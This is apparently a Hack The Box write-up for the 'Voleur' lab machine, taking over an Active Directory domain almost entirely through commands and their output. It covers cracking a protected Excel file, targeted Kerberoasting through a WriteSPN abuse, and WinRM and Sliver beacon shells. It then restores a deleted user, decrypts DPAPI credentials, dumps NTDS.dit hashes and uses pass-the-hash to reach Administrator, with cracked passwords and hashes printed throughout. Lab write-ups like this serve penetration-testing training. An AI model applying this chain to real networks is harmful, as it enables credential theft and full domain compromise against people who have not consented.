Voleur

quickie

User

Setup /etc/krb5.conf for kerberos authentication with voleur.htb

 [libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true

[realms]
    VOLEUR.HTB = {
        kdc = 10.10.11.76
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Set your /etc/hosts file appropriately

10.10.11.76 DC.voleur.htb voleur.htb

We can now request for a TGT using kinit and authenticate with kerberos

kinit ryan.naylor        
ryan.naylor@VOLEUR.HTB's Password: 
                                                                                                                                                                                                               
klist            
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: ryan.naylor@VOLEUR.HTB

  Issued                Expires               Principal
Jul  7 06:27:07 2025  Jul  7 16:27:07 2025  krbtgt/VOLEUR.HTB@VOLEUR.HTB

export KRB5CCNAME=/tmp/krb5cc_1000                    
                                                                                                                                                                                                               
klist
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: ryan.naylor@VOLEUR.HTB

  Issued                Expires               Principal
Jul  7 06:27:07 2025  Jul  7 16:27:07 2025  krbtgt/VOLEUR.HTB@VOLEUR.HTB

We can enumerate shares which gives us a protected excel file that can be cracked with office2john

office2john Access_Review.xlsx > hash.txt
                                                                                                                                                                                                                                                                                         
john --wordlist=/home/kali/Desktop/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)     
1g 0:00:00:01 DONE (2025-07-07 03:31) 0.7352g/s 611.7p/s 611.7c/s 611.7C/s football1..legolas
Use the "--show" optio

The excel file gives us the following credentials svc_ldap:M1XyC9pW7qT5Vn svc_iis: N5pXyW1VqM7CZ8 todd.wolfe: NightT1meP1dg3on14

svc_ldap has WriteSPN over svc_winrm, and since there is no ADCS in the domain, we can make use of targetedKerberoasting

bloodyAD -d voleur.htb --host dc.voleur.htb  -u svc_ldap -p M1XyC9pW7qT5Vn -k set object "svc_winrm" servicePrincipalName -v 'http/anything' 
[+] svc_winrm's servicePrincipalName has been updated

netexec ldap DC.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k --kerberoasting out.txt
LDAP        DC.voleur.htb   389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        DC.voleur.htb   389    DC               [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn 
LDAP        DC.voleur.htb   389    DC               [*] Skipping disabled account: krbtgt
LDAP        DC.voleur.htb   389    DC               [*] Total of records returned 1
LDAP        DC.voleur.htb   389    DC               [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 17:10:12.398769, lastLogon: 2025-07-07 03:14:39.737268
LDAP        DC.voleur.htb   389    DC               $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$e3a804f76a893f34385ed7418ff6bb1b$e5bae5f9ae418386b4383c5c7ba483322d4e458fe3662c426deb5b6590ece022b7a367e63a1cf06ca5171ae996549757b69dcf94f2553f3311657ccd4bbbb5d54c132edea6f1a7317cb0adf569a53a03efc76d844acc0910c37c4c69578af0e1d201c1b4718b4e53179c6b1185a8432ffa268def1f2d3919adf5677002d2b15a36e5833e7932a019c0fdc40602c815b1e0ce39b096026e2e054707980a06baa993c071e7d2fd838a8394ec7cd2e03c06d7a0c3060238564e4261dec1aa3cd266f1c646e09c4e4a1d65a31bf347b43b6a61cd1c9b8fb5de7856def4b2d68e945c19d91d54ac88e531723e46ac7617d3c8b151853652d7e3e884ff635a5b9e449f2739aaa81c741b61dcffb0ad388bc5738dd1f6ff35f6e82b8c640f11c1ff3e93eb97e42195affbcc77727d40b134f8dbeea4b2bc96dbb75586e95f4a04342a4a97bdde1dc50bb21b038274c2dab482267d2ad99d106838e5cc90666b2c31bf93e1061d6f9fed33aeccdf2a4415c4c704e7b6be0e5421fcf57962b90f8b7822efccb58a2f957317cea0953e57abf8c258e65050d0f2b2cf203531d6f5848172b1d876d3f1d0a60e940aee3f146173523869d1d3718fee6d19bc31418ebd412d8c67ae242cc5663355af140cf1f2928d443b2e1232946bda92f58af40c9cb302dd6f41ff1cf2c9e54f96defbe5cbe99b05e9db652fcc6659bed5587e25e07b8403691ab57ffc0eaf1a7513a9454ee4d4e6f64733b4de99a72f2febcc51b7b2901344fc972d91cbc43480f6294382a3f8326674fa0a58ed7908318f3dc3be7d38d70874b6dd06412b13fa42f727e6ea6bf00d7ae0c52ddb4784040ca1c3aeb557c2d54f15cf4cc0297857f2507e069951eaacf388c64cb035addf2f16ab28546e94665cbba2dc337df3667f8d3287b0d846384287429b9800d2ba244c883ae45e299cb1f9b43835ed06fd74a14eed346ceba4d0fb658fd8055b66015b356bab48521fd05e6a2b00354a8b01b45f6ea6f002e5f3099e1827e5a4136a822533efadc14a03adad41884f2e250b2d2460e2a455c870b3ae3a8808e5f3416ded37a148ae337429b1b90f9e0f225f2d69e5d077c58a2ed303520520af30a5cb89203aa0300b18707320f0b94dc7e7e784dd5b10cbd8896e32b7e645eeb9625b49e67bad042c23b96b05e03d7ba89ddf41a2e3925f10b1984f16467bd8a27b9bcbb7bc489c286e2311d48c5aebc1da8d46ce5e9382c3f20091902011f42fab6cbd7bf379a195087e041aefb252d124dec55d39805d42e15ad5af894200628f4b7c9fb32eb5351fd373c7662eed0af45712cfc0a9487ba85ac9f89540234709c2851ab8a62ba072ad648f4542a18a30e20cbac6e8957e2031460dc8c3914fd608bb0832a795a84b9bceae358b13f5d8f5f7c512a668911678efe4c7228ef056166d286a983880ef6ee125c92e4dad23d8be00ff016d34a331

$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$<snip>:AFireInsidedeOzarctica980219afi

We can get user flag from svc_winrm, using kinit to get a TGT for authentication with kerberos

kinit svc_winrm
svc_winrm@VOLEUR.HTB's Password: 
                                                                                                                                                                                                               
evil-winrm -i DC.voleur.htb -u svc_winrm  -r voleur.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> 

Root

svc_ldap is in the Restore Users group, which is hinted to be able to restore deleted user Todd.wolfe Getting a shell with svc_ldap using sliver and runascs.exe

execute-assembly /home/kali/Desktop/HTB/Tools/precompiled-binaries/LateralMovement/RunasCs.exe svc_ldap M1XyC9pW7qT5Vn a.exe

[*] Beacon bec3c39d OLD-FASHIONED_SHADOWBOX - 10.10.11.76:64050 (DC) - windows/amd64 - Mon, 07 Jul 2025 05:27:49 +08
  

We can do the following to restore deleted objects

PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects


Deleted           : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name              : Deleted Objects
ObjectClass       : container
ObjectGUID        : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8

Deleted           : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted 
                    Objects,DC=voleur,DC=htb
Name              : Todd Wolfe
                    DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db



PS C:\Windows\system32>  Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
 Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> Enable-ADAccount -Identity "Todd.Wolfe"
Enable-ADAccount -Identity "Todd.Wolfe"

We can test with netexec to see if we now have access to Todd.Wolfe using the password in excel NightT1meP1dg3on14

netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k        
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14 
                                                                                                                                                                                                               
netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k  --shares
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14 
SMB         DC.voleur.htb   445    DC               [*] Enumerated shares
SMB         DC.voleur.htb   445    DC               Share           Permissions     Remark
SMB         DC.voleur.htb   445    DC               -----           -----------     ------
SMB         DC.voleur.htb   445    DC               ADMIN$                          Remote Admin
SMB         DC.voleur.htb   445    DC               C$                              Default share
SMB         DC.voleur.htb   445    DC               Finance                         
SMB         DC.voleur.htb   445    DC               HR                              
SMB         DC.voleur.htb   445    DC               IPC$            READ            Remote IPC
SMB         DC.voleur.htb   445    DC               IT              READ            
SMB         DC.voleur.htb   445    DC               NETLOGON        READ            Logon server share 
SMB         DC.voleur.htb   445    DC               SYSVOL          READ            Logon server share 

We can access the IT share again to get access to a archived home directory of Todd.Wolfe We can extract dpapi protected data using impacket-dpapi The masterkey is at "C:\Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88 The credential blob is at C:\Users\todd.wolfe\AppData\Roaming\Credentials\772275FAD58525253490A9B0039791D3

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

Enumerate shares once again, getting access to svc_backup ssh key as hinted in the excel note previously. There is also WSL ssh access on Port 2222.

ssh -i id_rsa -p 2222 svc_backup@DC.voleur.htb                

Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul  6 15:05:32 PDT 2025

  System load:    0.52      Processes:             15
  Usage of /home: unknown   Users logged in:       0
  Memory usage:   60%       IPv4 address for eth0: 10.10.11.76
  Swap usage:     3%


363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jul  6 14:38:47 2025 from 10.10.11.76
 * Starting OpenBSD Secure Shell server sshd                                                                                                                                                            [ OK ] 
svc_backup@DC:~$ ls
svc_backup@DC:~$ whoami
svc_backup

We can access the \mnt directory and accessing the IT share once again, we see copies of SECURITY, SYSTEM and NTDS.dit

root@DC:/mnt/c/IT/Third-Line Support/Backups# ls
'Active Directory'   registry
root@DC:/mnt/c/IT/Third-Line Support/Backups# cd registry
root@DC:/mnt/c/IT/Third-Line Support/Backups/registry# ls
SECURITY  SYSTEM

We can now dump the domain and get access via evil-winrm

 impacket-secretsdump local -system SYSTEM -security SECURITY -ntds ntds.dit 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM 
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e377177574

Use impacket-getTGT as we do not have the password of Administrator

impacket-getTGT voleur.htb/Administrator  -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache
                                                                                                                                                                                                               
impacket-getTGT voleur.htb/Administrator  -hashes :e656e07c56d831611b577b160b259ad2
                                                                                                                                                                                                               
export KRB5CCNAME=./Administrator.ccache                   
                                                                                                                                                                                                               
evil-winrm -i dc.voleur.htb -u Administrator  -r voleur.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>